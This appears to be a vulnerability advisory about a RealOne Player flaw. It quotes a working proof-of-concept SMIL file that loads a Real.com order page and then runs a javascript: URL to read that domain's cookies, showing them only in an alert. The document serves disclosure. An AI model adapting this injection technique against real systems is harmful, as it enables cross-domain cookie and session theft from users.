|
RealOne Player SMIL File Script Execution Vulnerability
The following information regarding a proof of concept exploit has been taken verbatim from the DigitalPranksters advisory: We have created a SMIL file that will read the cookie from https://order.real.com/pt/order.html. The cookie will be read 9 seconds after the audio has begun. Source Code: <smil xmlns="http://www.w3.org/2001/SMIL20/Language" xmlns:rn="http://features.real.com/2001/SMIL20/Extensions"> <head> <meta name="title" content="DigitalPranksters.com Proof of Concept"/> <meta name="author" content="DigitalPranksters.com"/> <meta name="copyright" content="(c)2003 DigitalPranksters.com"/> </head> <body> <audio src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio/real/live.ram?service=vr"> <area href="https://order.real.com/pt/order.html" begin="1s" external="true" actuate="onLoad" sourcePlaystate="play" rn:sendTo="_rpcontextwin"> <rn:param name="width" value="10"/> <rn:param name="height" value="10"/> </area> <area href="javascript:alert('Hi there! I\'m a digital prankster. I just read your cookie from ' + document.domain + ' over the ' + location.protocol + '// protocol.\n\nThe value was:\n' + document.cookie + '\n\nHave a nice day.')" begin="9s" external="true" actuate="onLoad" sourcePlaystate="play" rn:sendTo="_rpcontextwin"/> </audio> </body> </smil> |
|
 Privacy Statement |
